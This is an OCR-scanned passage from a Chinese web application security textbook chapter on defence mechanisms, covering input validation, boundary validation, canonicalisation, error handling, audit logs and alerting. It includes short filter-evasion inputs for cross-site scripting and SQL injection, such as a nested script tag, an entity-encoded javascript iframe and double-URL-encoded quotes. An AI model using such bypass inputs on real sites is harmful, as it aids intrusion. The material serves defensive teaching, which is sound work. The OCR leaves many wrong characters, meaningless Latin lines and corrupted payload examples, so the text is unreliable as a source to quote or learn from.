用 程序 可 能 会 确认 其 仅 包含 字母 数字 字符 ， 长 度 正 好 为 6 个 字符 。 根 据 


随后 对 产品 代码 进行 的 处 理 ， 开 发 者 知道 通过 这 种 测试 的 输入 不 会 造 
成 任何 问题 。 

在 切实 可 行 的 情况 下 ， 这 种 方法 是 处 理 潜 在 恶意 输入 的 最 有 效 方 
法 。 因 为 在 制定 日 名 单 时 已 经 非常 小 心 ， 所 以 攻击 者 无 法 使 用 专门 设 
计 的 输入 来 干扰 应 用 程序 的 行为 。 然而， 在 许多 情况 下 ， 应 用 程序 必 
须 接 受 并 不 满足 任何 已 知 * 正 党 ?标准 的 数据 ， 并 对 其 进行 处 理 。 例 
如 ， 在 一 些 人 的 姓名 中 包含 撤 号 和 连 字 符 的 情况 。 这 些 数据 可 用 于 对 
数据 库 发 动 攻击 。 但 也 可 能 存在 这 样 的 要 求 ， 即 应 用 程序 应 允许 任何 
人 以 真实 姓名 和 注册。 因此， 虽然 这 种 方法 极其 有 效 ， 但 基于 日 名 单 的 
人 

Ae 


这 种 方法 认可 有 时 需要 接受 无 法 保证 其 安全 的 数据 。 应 用 程序 并 
不 拒绝 这 种 输入 ， 相 反 ， 它 以 各 种 方式 对 其 进行 净化 ， 防 止 它 造成 任 
何不 利 的 影响 。 数 据 中 可 能 存在 的 恶意 字符 被 彻底 删除 掉 ， 只 留 下 已 
知 安全 的 字符 ， 或 者 在 进一步 处 理 前 对 它们 进行 适当 编码 或 “ 转 义 ”。 

基于 数据 净化 的 方法 一 般 非 常 有 效 。 在 许多 情况 下 ， 可 将 其 作为 
处 理 恶 意 输 入 问题 的 通用 解决 办 法 。 例 如 ， 在 将 危险 字符 植 入 应 用 程 
序 页 面前 对 其 进行 HTML 编 码 ， 是 防御 跨 站 点 脚本 攻击 的 常用 方法 
(请 参阅 第 12 章 了 解 相关 内 容 ) 。 然 而 ， 如 果 需 要 在 一 个 输入 项 中 容 
纳 几 种 可 能 的 恶意 数据 ， 可 能 就 很 难 对 其 进行 有 效 的 净化 。 这 时 ， 最 
好 采用 边界 确认 方法 处 理 用 户 输入 ， 如 后 文 所 述 。 

4. 安全 数据 处 理 

以 不 安全 的 方式 处 理 用 户 提 交 的 数据 ， 是 许多 Web 应 用 程序 漏洞 
形成 的 根本 原因 。 通 常 ， 不 需要 确认 输入 本 身 ， 只 需 确保 处 理 过 程 绝 
对 安全 ， 即 可 避免 这 些 漏 洞 。 有 些 时 候 ， 可 使 用 安全 的 编程 方法 避免 
常见 问题 。 例 如 ， 在 数据 库 访问 过 程 中 正确 使 用 参数 化 查询 ， 就 可 以 
避免 SQL 注入 攻击 (请 参阅 第 9 章 了 解 相 关内 容 ) 。 在 其 他 情况 下 ， 完 
全 可 以 避免 应 用 程序 功能 设计 不 安全 的 做 法 ， 如 向 操作 系统 命令 解释 
程序 提交 用 户 输入 。 

这 种 方法 并 不 适用 于 Web 应 用 程序 需要 执行 的 每 项 任务 ， 但 如 果 
适用 ， 它 是 一 种 有 效 处 理 潜 在 恶意 输入 的 通用 方法 。 

5. 语法 检查 

迄今 为 止 ， 本 书 描 述 的 防御 措施 全 都 用 于 防止 应 用 程序 接受 各 种 
错误 的 输入 ， 攻 击 者 专门 设计 这 些 输入 的 内 容 以 干扰 应 用 程序 的 处 理 
过 程 。 然 而 ， 在 一 些 漏洞 中 ， 攻 击 者 提交 的 输入 与 普通 的 非 恶意 用 户 
提交 的 输入 完全 相同 。 之 所 以 称 其 为 恶意 输入 ， 是 因为 攻击 者 提交 的 


动机 不 同 。 例 如 ， 攻 击 者 可 能 会 修改 通过 隐藏 表单 字段 提交 的 账号 ， 
企图 访问 其 他 用 户 的 银行 账户 。 这 时 ， 再 多 的 语法 确认 也 无 法 区 别 用 
户 与 攻击 者 的 数据 。 为 防止 未 授权 访问 ， 应 用 程序 必须 确认 所 提交 的 
账号 属于 之 前 提交 该 账号 的 用 户 。 


2.2.3 ”边界 确认 


在 信任 边界 确认 数据 的 做 法 并 不 少见 。 用 户 提 交 的 数据 不 可 信和 是 
造成 Web 应 用 程序 核心 安全 问题 的 主要 原因 。 虽 然 在 客户 端 执行 的 输 
入 确认 检查 可 以 提高 性 能 ， 改 善 用 户 体 验 ， 但 它们 并 不 能 为 实际 到 达 
服务 器 的 数据 提供 任何 保证 。 服 务 器 端 应 用 程序 第 一 次 收 到 用 户 数据 
en ener 
ALA © 

鉴于 核心 问题 的 本 质 ， 可 以 基于 因特网 (“不 良 ” 且 不 可 信 ) 与 服 
务 器 端 应 用 程序 (“正常 * 且 可 信 ) 之 间 的 边界 来 考虑 输入 确认 问题 。 
从 这 个 角度 看 ， 输 入 确认 的 任务 就 是 净化 到 达 的 潜在 恶意 数据 ， 然 后 
将 “洁净 的 ”数据 提交 给 可 信 的 应 用 程序 。 此 后 ， 数 据 即 属 于 可 信 数 
据 ， 不 需要 任何 进一步 的 检查 或 担心 可 能 的 攻击 ， 即 可 进行 处 理 。 

很 明显 ， 当 我 们 开始 分 析 一 些 实际 的 漏洞 时 ， 执 行 这 种 简单 的 输 
入 确认 是 不 够 的 ， 原 因 如 下 。 

口 基 于 应 用 程序 所 执行 功能 的 广泛 性 以 及 其 所 采用 技术 的 多 样 
性 ,一 个 典型 的 应 用 程序 需要 防御 大 量 各 种 各 样 的 基于 输入 的 攻击 ， 
且 每 种 攻击 可 能 采用 一 组 截然 不 同 的 专门 设计 的 数据 。 因 此 ， 很 难 在 
外 部 边界 建立 一 个 单独 的 机 制 ， 防 御所 有 这 些 攻 击 。 

口 许多 应 用 程序 功能 都 涉及 组 合 一 系列 不 同类 型 的 处 理 过程 。 用 
户 提交 的 一 项 输入 可 能 会 在 不 同 的 组 件 中 引发 许多 操作 ， 其 中 前 一 个 
操作 的 输出 结果 被 用 于 后 一 个 操作 的 输入 。 

数据 发 生 转 换 后 ， 可 能 会 变 得 与 原始 的 输入 完全 不 同 。 而 经 验 丰 
富 的 攻击 者 能 够 操纵 应 用 程序 ， 在 关键 处 理 阶 段 生 成 恶意 输入 ， 攻 击 
接收 这 些 数 据 的 组 件 。 为 此 ， 很 难 在 外 部 边界 执行 确认 机 制 ， 预 测 每 
一 个 用 户 输入 的 全 部 可 能 处 理 结果 。 

o 防御 不 同类 型 的 基于 输入 的 攻击 可 能 需要 对 相互 矛盾 的 用 户 输 
入 执行 各 种 确认 检查 。 例 如 ， 防 止 跨 站 点 脚本 攻击 可 能 需要 将 > 字符 
HTML 编 码 为 &lt， 而 防止 命令 注入 攻击 则 需要 阻止 包含 点 与 ;字符 的 
输入 。 有 时 候 ， 想 要 在 应 用 程序 的 外 部 边界 同时 阻止 所 有 类 型 的 攻击 
几乎 是 不 可 能 的 事情 。 


边界 确认 (boundary validation) 是 一 种 更 加 有 效 的 模型 。 此 时 ， 
服务 器 端 应 用 程序 的 每 一 个 单独 的 组 件 或 功能 单元 将 其 输入 当做 来 自 
潜在 恶意 来 源 的 输入 对 待 。 除 客户 端 与 服务 器 之 间 的 外 部 边界 外 ， 应 
用 程序 在 上 述 每 一 个 信任 边界 上 执行 数据 确认 。 这 种 模型 为 前 面 提出 
的 问题 提供 了 一 个 解决 方案 。 每 个 组 件 都 可 以 防御 它 收 到 的 特殊 类 型 
的 专门 设计 的 输入 。 当 数据 通过 不 同 的 组 件 时 ， 即 可 对 前 面 转换 过 程 
中 生成 的 任意 数据 值 执行 确认 检查 。 而 且 ， 由 于 在 不 同 的 处 理 阶段 执 
行 不 同 的 确认 检查 ， 它 们 之 间 不 可 能 发 生 冲突 。 

图 2-5 说 明了 一 种 典型 情况 ， 此 时 边界 确认 是 防御 恶意 输入 的 最 有 
效 方法 。 在 用 户 登 录 过 程 中 ， 需 要 对 用 户 提交 的 输入 进行 几 个 步骤 的 
处 理 ， 并 在 每 个 步骤 执行 适当 的 确认 检查 。 
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图 2-5 一 种 在 多 阶段 处 理 步 又 中 使 用 边界 确认 的 应 用 程序 功能 


(1) 应 用 程序 收 到 用 户 的 登录 信息 。 表 单 处 理 程序 确认 每 个 输入 
仅 包含 合法 字符 ， 符 合 特殊 的 长 度 限 制 ， 并 且 不 包 舍 任 何 已 知 的 攻击 


(2) 应 用 程序 执行 一 个 SQL 查询 检验 用 户 证 书 。 为 防止 SQL 注入 
攻击 ， 在 执行 查询 前 ， 应 用 程序 应 对 用 户 输入 中 包含 的 可 用 于 攻击 数 
据 库 的 所 有 字符 进行 转 义 。 

(3) 如 果 用 户 成 功 登录 ， 应 用 程序 再 将 用 户 资 料 中 的 某 些 数据 传 
送 给 SOAP 服 务 ， 进 一 步 获得 用 户 账户 的 有 关 信 息 。 为 防止 SOAP 注 入 
攻击 ， 需 要 对 用 户 资 料 中 的 任何 XML 元 字符 进行 适当 编码 。 


(4) 应 用 程序 在 用 户 的 浏览 器 中 显示 用 户 的 账户 信息 。 为 防止 跨 
站 点 脚本 攻击 ， 应 用 程序 对 植 入 返回 页 面 的 任何 用 户 提交 的 数据 执行 
HTML 编码 。 

我 们 将 在 后 续 章 市 详细 介绍 上 文摘 述 的 特殊 漏洞 和 防御 机 制 。 如 
果 这 一 功能 发 生变 化 ， 需 要 同 其 他 应 用 程序 组 件 提 交 数 据 ， 那 么 可 能 
需要 在 相关 信任 边界 执行 类 似 的 防御 。 例 如 ， 如 果 登 录 失 败 致 使 应 用 
程序 癌 用 户 发 送 警 告 电子 邮件 ， 那 么 可 能 需要 检查 合并 到 电子 邮件 中 
的 所 有 用 户 数据 ， 防 止 SMTP 注 入 攻击 。 


2.2.4 ”多 步 确认 与 规范 化 


在 确认 检查 过 程 中 ， 当 需要 在 儿 个 步 又 中 处 理 用 户 提交 的 输入 
时 ， 束 会 出 现 一 个 输入 处 理 机 制 经 常 遇 到 的 问题 。 如 采 不 齐 慎 处 理 这 
个 过 程 ， 那 么 攻击 者 束 能 够 建立 专门 设计 的 输入 ， 使 恶意 数据 成 功 避 
开 确 认 机 制 。 当 应 用 程序 试图 通过 删除 或 编码 茶 些 字符 或 表达 式 净 化 
用 户 输 入 时 ， 融 会 出 现 这 种 问题 。 例 如 ， 为 防御 某 些 跨 站 点 脚本 攻 
击 ， 应 用 程序 可 能 会 从 任何 用 户 提交 的 数据 中 删除 表达 式 : 


<script> 


但 攻击 者 可 通过 应 用 以 下 输入 避 开 过 滤器 : 


<scr<script>ipt> 


由 于 过 滤 无 法 递归 运行 ， 删 除 被 阻 止 的 表达 式 后 ， 表 达 式 周围 的 
数据 又 合并 在 一 起 ， 重 新 建立 恶意 表达 式 。 

同样 ， 如 果 对 用 户 输 入 执行 几 个 确认 步 台 ， 攻 击 者 就 可 以 利用 这 
些 步 又 的 顺序 来 避 开 过 小。 例如 ， 如 果 应 用 程序 首先 递归 删除 .\， 然 
后 递归 删除 .\， 丈 可 以 使 用 以 下 输入 避 开 确认 检查 : 


ar, tf 


数据 规范 化 (data canonicalization) 会 造成 男 一 个 问题 。 当 用 户 浏 
览 硕 送出 输入 时 ， 它 可 对 这 些 输入 进行 各 种 形式 的 编码 。 之 所 以 使 用 
这 些 编码 方案 ， 是 为 了 能 够 通过 HTTP 安 全 传送 不 常见 的 字符 与 二 进 制 
数据 〈 请 参阅 第 3 章 了 解 更 多 详情 ) 。 规 范 化 是 指 将 数据 转换 或 解码 成 
一 个 第 见 字 符 集 的 过 程 。 如 有 果 在 实施 输入 过 滤 之 后 才 执 行规 范 化 ， 那 
么 攻击 者 号 可 以 通过 使 用 编码 避 开 确认 机 制 。 


例如 ， 应 用 程序 可 能 会 从 用 户 输 入 中 删除 省 略 号 ， 以 防止 某 些 
SQL 注入 攻击 。 但 是 ， 如 采 应 用 程序 随后 对 净化 后 的 数据 进行 规范 
化 ， 那 么 攻击 者 束 可 以 使 用 URL 编 码 的 输入 避 开 确认 : 


— 
$2527 


收 到 该 答 入 后 ， 应 用 程序 服务 器 会 执行 正 芝 的 URL 解 得 ， 因 此 该 
输入 变 为 : 


%27 


其 中 并 不 包含 省 略 号 ， 因 此 ， 应 用 程序 的 过 滤器 允许 该 输入 。 但 
是 ， 如 果 应 用 程序 执行 进一步 的 URL 解 码 ， 该 输入 将 变 为 省 略 号 ， 从 
而 避 开 过 滤 。 

如 果 应 用 程序 删除 而 不 是 阻止 省 略 号， 然后 执行 进一步 的 规范 
化 ， 则 可 以 使 用 以 下 输入 和 避 开 过 滤 : 


$%2727 


(AER, EAER, MAESA Am ERMIT 
多 步 确 认 和 规范 化 。 例 如 ， 在 下 面 的 输入 中 ， 几 个 字符 已 被 HTML 编 
GE 


<iframe srce=j&#x61l;vasc&k#x72ipt&#xia;alert&#x28;1&#x29; > 


WRIS aim FETE ARA ER LE JavaScript KIAIN 
MFF, ORISHA A AREE ° (AE, WRAHA E 
后 被 复制 到 应 用 程序 的 啊 应 中 ， 某 些 浏览 絮 将 对 src 参 数值 执行 HTML 
解码 ， 骨 入 的 JavaScript 将 得 以 执行 。 

除了 供 Web 应 用 程序 使 用 的 标准 编码 方案 外 ， 其 他 情况 下 ， 如 果 
应 用 程序 采用 的 组 件 将 数据 从 一 个 字符 集 转换 为 男 一 个 字符 集 ， 这 也 
会 导致 规范 化 问题 。 例 如 ， 某 些 技术 会 基于 印刷 字形 的 相似 性 ， 对 字 
符 执行 “最 佳 " 欧 射 。 这 时 ， 字 符 《 和 》 分 别 被 转换 为 < 和 >， 立 和 A 则 被 
转换 为 Y 和 A。 攻 击 者 经 常 利 用 这 种 方法 传送 受阻 止 的 字符 或 天 键 字 ， 
从 而 避 开 应 用 程序 的 输入 过 滤 。 

本 书 将 详细 介绍 这 类 攻击 ， 它 们 可 有 鸡 挫 败 应 用 程序 针对 常见 的 
基于 输入 的 漏洞 而 采取 的 许多 防御 机 制 。 

有 时 候 ， 可 能 很 难 避 免 多 步 确认 与 规范 化 造成 的 问题 ， 也 不 存在 
解决 这 类 问题 的 唯一 方案 。 一 种 解决 办 法 是 递归 执行 净化 操作 ， 直 到 


无 法 进一步 修改 输入 。 然 而 ， 如 果 需 要 在 净化 过 程 中 对 一 个 存在 疑问 
的 字符 进行 转 义 ， 那 么 这 种 情况 可 能 会 造成 无 限 循环 。 通 常 ， 这 个 问 
题 只 有 根据 具体 情况 、 基 于 所 执行 的 确认 类 型 加 以 解决 。 如 采 可 能 ， 
最 好 避免 净化 某 些 不 民 输 入 的 做 法 ， 完 全 拒绝 这 种 类 型 的 输入 。 


2.3 理 


任何 设计 安全 应 用 程序 的 开发 人 员 必 须 基 于 这 样 一 个 假设 : 应 用 
程序 将 成 为 蓄意 破坏 且 经 验 丰 富 的 攻击 者 的 直接 攻击 目标 。 能 够 以 受 
控 的 方式 处 理 并 应 对 这 些 攻击 ， 是 应 用 程序 安全 机 制 的 一 项 主要 功 
能 。 这 些 机 制 通常 结合 使 用 一 系列 防御 与 攻击 措施 ， 以 尽 可 能 地 阻止 
攻击 者 ， 并 束 所 发 生 的 事件 ， 通 知 应 用 程序 所 有 者 以 及 提供 相应 的 证 
据 。 为 处 理 攻击 者 而 采取 的 措施 一 般 由 以 下 任务 组 成 : 

口 MER EATER 

口 维护 审计 日 志 ; 

口 回 管理 员 发 出 警报 ; 

口 应 对 攻击 。 


2.3.1 _ 处理 错误 


不 管 应 用 程序 开发 者 在 确认 用 户 输入 时 多 么 小 心 ， 还 是 几乎 可 以 
肯定 会 出 现 一 些 无 法 预料 的 错误 。 功 能 与 用 户 验 收 测试 过 程 能 够 查 明 
普通 用 户 行为 造成 的 错误 ， 在 生产 环境 中 部 嗜 应 用 程序 前 应 当 考虑 到 
这 一 因 妹 。 然 而 ， 我 们 无 法 预测 恶意 用 户 与 应 用 程序 交互 的 每 一 种 可 
能 方式 ， 并 且 当 应 用 程序 遭受 攻击 时 肯定 会 出 现 其 他 错误 。 

应 用 程序 的 一 个 关键 防御 机 制定 合理 地 处 理 无 法 预料 的 错误 ， 要 
么 纠正 这 些 错误 ， 要 么 问 用 户 发 送 适 当 的 错误 消 轧 。 在 生产 环境 下 ， 
应 用 程序 不 应 在 其 啊 应 中 返回 任何 系统 生成 的 消息 或 其 他 调试 信息 。 
过 于 详细 的 错误 消息 非常 有 利于 恶意 用 户 回 应 用 程序 发 动 进 一 步 攻 
击 。 有 些 情况 下 ， 攻 击 者 能 够 利用 存在 缺陷 的 错误 处 理 方法 从 错误 请 
轧 中 获得 敏感 信息 ;此 时 ， 错 充 消 妃 成 为 攻击 着 从 应 用 程序 中 守 取 数 
ee 
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weaala Firefox > fees 


File Edt Yew History Bookmarks Tools Help 


(<7 A ¢ A LE mdsec.net/addressbook/ 4 P 


https//mdsecnet/addressbook/ 
[07/05/22 01 
java lang Excephos 
(077057 2519.687) SQL Exception 
ORA-00921: unexpected end of SQL command SQLState: 42000 VendorError: 921 
select price_cale from contertowne: nernbr= 
SQL;at org apache jsp.dStor | s(GStore_jsp java 1 at 
org. apache jasper.runtime. HttpIspBase.s ice (Hapl yig ava: 137); at 
Javax servlet http HtpServiet servic poervlet jav „at 
org apache jasper servlet IspServi maceUspServiet Wrapper java’ 204), at 
org apache jasper servlet Japeri erncelspidellspSerslet java:295), 
panha Depom 
í OSI 8- 19.687] SQL Excepto 
e 00921; unexpected end of SQL command 


State 42 2000 VendorEnor. 921 
CR alc from contertowners where ownembr= 


SOL;at org apache jsp.dStore_jep._jspService(dStors_jsp java 124); ar 


org. apache jasper. cuname ae JspBace sernce(AnpJer press ava 137); an 
jarax servlet. bttp HitpServiet service(HitpServiet java 853), at 
org.apache jasper. cavities poorvier Wr pars service(JepServliet Wrapper. java:2 04), at 
org apache jasper servlet JepGorelet service de{JspServiet java: 295), 
Done 


图 2-6 一 个 无 法 处 理 的 错误 


大 多 数 Web 开 发 语言 通过 try-catch 块 和 受 查 异常 提供 良好 的 错误 处 
理 支持 。 o 应 用 程序 代码 应 广泛 使 用 这 些 方法 查 明 特殊 与 常规 错 嵌 ， 并 
做 出 相应 处 理 。 而 且 ， 还 可 以 配置 大 多 数 应 用 程序 服务 器 ， 使 其 以 自 
定义 的 方式 处 理 无 法 处 理 的 应 用 程序 错误 ， 如 提供 不 包含 太 多 信息 的 
错误 消息 。 请 参阅 第 15 章 了 解 有 天 这 些 措施 的 更 多 详情 。 

有 效 的 错误 处 理 措施 通常 与 应 用 程序 的 日 志 机 制 整合 在 一 起 ， 后 
者 尽 可 能 地 记录 与 无 法 预料 的 错误 有 关 的 调试 信息 。 通 常 ， 无 法 预料 
的 错误 往往 能 够 指明 应 用 程序 的 防御 机 制 中 存在 的 缺陷 。 如 果 应 用 程 
序 的 所 有 者 获得 必要 的 信息 ， 束 能 从 源头 解决 这 些 问题 。 


2.3.2 计 上 日 志 


审计 日 志 (audit log) 在 调查 针对 应 用 程序 的 入 侵 尝试 时 会 发 挥 很 
大 作用 。 发 生 入 侵 后 ， 有 效 的 审计 日 志 功 能 应 能 够 帮助 应 用 程序 所 有 
者 了 解 实际 发 生 的 情况 ， 如 哪些 漏洞 (如 果 有 ) 被 加 以 利用 ， 攻 击 者 


否 可 以 对 数据 进行 非法 访问 或 执行 任何 未 授权 的 操作 ， 并 尽 可 能 地 
从 供 侵 入 者 的 身份 信息 。 

在 任何 注重 安全 的 应 用 程序 中 ， 日 志 应 记录 所 有 重要 事件 。 一 般 
这 些 事件 应 至 少 包括 以 下 几 项 。 
a 能 有 关 的 事件 ， 如 成 功 或 失败 的 登录 、 密 码 
Br 

口 关键 交易 ， 如 信用 卡 支 付 与 转账 。 

口 被 访问 控制 机 制 阻止 的 访问 企图 

口 任何 包含 已 知 攻击 字符 串 ， 公 然 表 明 恶 意 意 多 的 请 求 。 

许多 安全 性 至 关 重 要 的 应 用 程序 (如 电子 银行 使 用 的 应 用 程序 ) 
会 完整 记录 客户 端 提出 的 每 一 个 请 求 ， 这 样 可 为 任何 事故 调查 提供 全 
面 的 司法 记录 。 

HARIANI El ORE AR CR BR IR IPH EN Ta» At HER 
的 IP 地 址 和 用 户 的 账户 (如 果 通 过 验证 ) 。 这 些 日 志 必 须 受到 严格 保 
护 ， 避 免 末 授权 的 读 取 或 写 入 访问 。 一 种 有 效 的 保护 方法 是 将 审计 日 
志保 存在 仪 接受 主 应 用 程序 送出 的 更 新 消 轧 的 目 治 系统 中 。 某 些 情况 
下 ， 可 能 需要 将 日 志 复 制 到 一 次 性 写 入 的 媒质 中 ， 确 你 它们 的 完整 
性 ， 以 便 在 遭受 攻击 后 进行 调查 。 

tee ae 保护 不 闫 宅 的 审计 日 志 可 能 为 攻击 者 提供 大 量 
言 轧 ， 回 其 披露 许多 敏感 信息 ， 如 会 话 令 牌 和 请 求 参数 ， 这 些 信息 可 
能 会 全 攻击 者 和 EB 够 立即 攻破 整个 应 用 程序 ( 见 图 2-7) 。 


È Mozilla Firefox S25 fo ox") 


File Edit View History Bookmarks Tools Help 


@ -c Ae E Miba coge P 


_ Wttps://mdsec.nct/logs/ 
T0S/Nar/2007:19:31:25 +0100] "POST /lx-office-erp/acmin.pl HTTP/1.1" 200 1085 "ht:- 
(OS/ Mar/2007:19:34:39 +0100] "GET /1x-office-erp/ admin. p1 sage tog ag grein cnet age 
*9S/Mar/2007: 19:34:56 +0100] "POST /lx-office-erp/acmin.pl HTTP/1.1" 200 28SE "he 
'OS/Mar/2007:19:35:09 +0100] "POST /lx-office-erp/login.pl HTTP/1.1”" 200 5366 "hri 
5 
5 


TOS/ Nw: / 2007:19:93 
05/Nar/2007:19:35:23 +0100] "GET /lx-office-erp/css/menuv3.css7id=94273 HTTF/1.1 
[05/Nar/2007:19:35:23 +0100] "GET /lx-ottice-erp/image/ba titel.gif HTTF/1.1" 200 

9:35:23 40100) "GET /lx-of fice-erp/image/bg css_menu.png ETTP/1.1" 
°OS/Mar/2007:19:35:23 40100) "GET /lx-office-erp/ locin. pl?login=andreassépassrord= 
E 


222 +0100] "GET fix-uLlEitu-uip/imnuv3 .pl7lvugis- eum Gala noises 


[OS/ Mar /2007 5:25 40100) "GET /lx-office-erp/ image/right.gif HTTP/1.1" 200 60 
[OS/Mar/2007 :28 +0100] "GET /lx-office-erp/ct.pl?action"searchs level*Master 
'O05/ Mar /2007 š +0100] “POST /1x-office-erp/ct.pl HTTP/1.1” 200 14700 "http 


[0S5/Mar/2007:19:35:38 +0100] "GET /lx-ottice-erp/ar.pl ?acrion=searchs level =iR--Re: 
[OS/Mar/2007:19:35:39 +0100] "GET /lx-otfice-erp/j3/jscalendar/calendar-vinzk-1.ci~- 


Done 


图 2-7 保护 不 严密 、 包 含 其 他 用 户 提 交 的 敏感 信息 的 应 用 程序 日 志 


2.3.3 ”向 管理 员 发 出 警报 


审计 日 志 可 帮助 应 用 程序 所 有 者 调查 入 侵 企图 ， 如 有 可 能 ， 应 对 
侵入 者 采取 法 律 行动 。 然 而 ， 许 多 时 候 我 们 希望 立即 采取 行动 ， 实 时 
啊 应 攻击 企图 。 例 如 ， 管 理 员 可 能 会 阻止 被 攻击 者 利用 的 IP 地 址 或 用 
户 账户 。 在 极端 情况 下 ， 他 们 甚至 可 能 在 调查 攻击 、 采 取 补 救 措 施 时 
将 应 用 程序 从 网 络 中 断 开 。 这 时 ， 即 使 攻击 者 已 经 成 功 侵入 应 用 程 
序 ， 如 采 能 够 及 时 采取 防御 措施 ， 也 可 以 将 实际 影响 降 到 最 低 。 

许多 时 候 ， 警 报 机 制 必须 在 两 个 相互 矛盾 的 目标 之 间 取 得 平衡 ， 
既 准 确 报告 每 次 的 真实 攻击 ， 又 不 会 生成 过 多 和 警报， 造成 它们 被 管理 
员 忽 上 略 。 精 心 设计 的 报警 机 制 能 够 组 合 各 种 因素 ， 确 定 应 用 程序 正在 
遭受 的 某 种 攻击 ;并 在 可 能 的 情况 下 将 所 有 相关 事件 集中 到 一 个 警报 
中 。 和 车 报 监控 的 反常 事件 一 般 包括 以 下 几 种 。 

口 应 用 反常 ， 如 收 到 由 单独 一 个 IP 地 址 或 用 户 发 出 的 大 量 请 求 ， 
表明 应 用 程序 正 受 到 目 定义 攻击 。 
口交 易 反 和 ， 如 单独 一 个 银行 账户 所 转 入 或 转 出 的 资金 数量 出 现 


口 包含 已 知 攻 击 字 符 串 的 请 求 。 
口 请 求 中 普通 用 户 无 法 碍 看 的 数据 被 修改 。 
现 有 的 应 用 程序 防火 墙 和 入 侵 检测 产品 能 够 相当 完善 地 提供 其 中 
一 些 功 能 。 这 些 产 品 一 般 组 合 应 用 一 组 基于 签名 与 异常 的 规则 来 确定 
对 应 用 程序 的 恶意 利用 ， 并 能 够 主动 阻止 恶意 请 求 ， 回 管理 员 发 出 警 
报 。 这 些 产品 构成 保护 Web 应 用 程序 的 一 个 重要 防御 层 ， 当 已 知 现 有 
应 用 程序 存在 漏洞 ， 但 可 用 资源 却 无 法 修复 这 些 调 油 时， 它们 特别 有 
用 。 然 而 ， 由 于 每 个 web 应 用 程序 都 各 不 相同 ， 这 些 产 品 的 效用 也 往 
往 受 到 限制 ， 其 采用 的 规则 也 因而 趋 于 一 般 化 。Web 应 用 程序 防火 墙 
通常 能 够 确定 最 明显 的 攻击 ， 在 这 种 攻击 中 ， 攻 击 者 在 每 一 个 请 求 参 
数 中 提交 标准 的 攻击 字符 串 。 然 而 ， 与 这 种 攻击 相 比 ， 许 多 攻击 往往 
更 加 隐蔽 ， 例 如 修改 隐藏 表单 字段 中 的 账号 来 访问 其 他 用 户 的 数据 ， 
或 者 提交 无 序 请 求 以 利用 应 用 程序 逻辑 中 存在 的 缺陷 。 在 这 些 情况 
下 ， 攻 击 者 提交 的 请 求 可 能 与 善意 用 户 提 交 的 请 求 完 全 相同 。 之 所 以 
称 为 恶意 请 求 ， 是 因为 提交 请 求 的 环境 有 所 不 同 。 

在 任何 安全 性 至 关 重 要 的 应 用 程序 中 ， 进 行 实时 警报 的 最 有 效 方 
法 是 将 其 与 应 用 程序 的 输入 确认 机 制 和 其 他 控制 方法 紧密 结合 起 来 。 
例如 ， 如 果 认 为 cookie 中 包含 一 组 特殊 值 中 的 某 个 值 ， 那 么 任何 违反 


所 
a 


这 种 情况 的 现象 即 表明 该 值 已 被 修改 ， 而 且 应 用 程序 的 普通 用 户 无 法 
执行 此 类 修改 。 同 样 ， 如 采 一 名 用 户 修改 隐藏 表单 字段 中 的 账号 ， 以 
确定 另 一 名 用 户 的 账户 ， 这 种 做 法 也 明确 表现 出 恶意 意图 。 应 用 程序 
的 主要 防御 机 制 应 阻止 这 些 攻击 ， 而 且 ， 这 些 保护 机 制 可 轻易 与 应 用 
程序 的 警报 机 制 进行 整合 ， 提 供 完全 目 定 义 的 恶意 行为 警示 。 因 为 已 
经 根据 应 用 程序 的 实际 逻辑 定制 这 些 检 查 ， 如 果 清 楚 了 解 普通 用 户 的 
操作 权限 ， 那 么 不 管 任何 现 有 的 解决 方案 多 么 易于 配置 ， 与 之 相 比 ， 
它们 都 能 提供 更 加 准确 的 警报 。 


2.3.4 ”应 对 攻击 


除 回 管理 员 发 出 警报 外 ， 许 多 安全 性 至 关 重 要 的 应 用 程序 还 含有 
内 置 机 制 ， 以 防御 洪 在 恶意 用 户 。 

由 于 应 用 程序 各 不 相同 ， 现 实 世界 中 的 许多 攻击 要 求 攻击 者 系统 
地 探查 应 用 程序 中 存在 的 漏洞 ， 提 交 无 数 包 侣 专门 设计 的 输入 请 求 ， 
以 确定 其 中 是 否 存 在 各 种 常见 的 漏洞 。 融 效 的 输入 确认 机 制 能 够 把 许 
多 这 种 类 型 的 请 求 确定 为 潜在 的 恶意 请 求 ， 并 阻止 这 些 输入 ， 防 止 它 
们 给 应 用 程序 造成 任何 不 利 影响 。 然 而 ， 我 们 还 应 意识 到 ， 攻 击 者 仍 
然 能 够 以 某 种 方式 避 开 这 些 过 滤 ， 而 且 ， 应 用 程序 确实 包含 菏 些 实际 
的 漏洞 ， 等 每 攻击 者 去 发 现 和 利用 。 从 茶 种 意义 上 说 ， 进 行 系统 性 探 
查 的 攻击 者 可 能 会 发 现 这 些 缺 陷 。 

有 鉴于 此 ， 一 些 应 用 程序 采取 目 动 反应 措施 阻止 攻击 者 进行 这 种 
形式 的 探查 ， 例 如 对 攻击 者 提交 的 请 求 的 啊 应 速度 变 得 越 来 越 慢 ， 或 
者 终止 攻击 者 的 会 话 ， 要 求 其 重新 登录 或 在 继续 攻击 前 执行 其 他 步 
又 。 虽 然 这 些 措施 无 法 阻挡 最 有 耐心 和 决心 的 攻击 者 ， 但 能 够 阻止 许 
多 很 随意 的 攻击 者 ， 并 且 为 管理 员 监 控 此 类 情况 、 在 必要 时 采取 更 加 
产 厉 的 措施 顾 得 时 间 。 

当然 ， 阻 止 显 而 易 见 的 攻击 并 不 如 修复 应 用 程序 中 存在 的 所 有 漏 
洞 重要 。 人 然而， 在 现实 情况 中 ， 即 使 我 们 为 清除 应 用 程序 中 的 安全 缺 
陷 做 出 了 不 懈 努 力 ， 仍 然 会 有 一 些 可 供 利用 的 缺陷 存在 。 给 攻击 者 设 
置 更 多 阻碍 是 一 种 有 效 的 深层 防御 措施 ， 这 样 做 能 够 降低 任何 残存 的 
漏洞 被 发 现 和 利用 的 可 能 性 。 


2.4 ”管理 应 用 程序 


任何 有 用 的 应 用 程序 都 需要 进行 管理 与 维护 ， 这 种 功能 通 第 是 应 
用 程序 安全 机 制 的 一 个 重要 组 成 部 分 ， 可 帮助 管理 员 管 理 用 户 账户 与 
角色 、 应 用 监控 与 审计 功能 、 执 行 诊断 任务 并 配置 应 用 程序 的 各 种 功 
能 。 

许多 应 用 程序 一 般 通过 相同 的 Web 寞 面 在 内 部 执行 管理 功能 ， 这 
也 是 它 的 核心 非 安全 功能 ， 如 图 2-8 所 示 。 在 这 种 情况 下 ， 管 理 机 制 就 
成 为 应 用 程序 的 主要 受 攻击 面 。 它 吸引 攻击 者 的 地 方 主要 在 于 它 能 够 
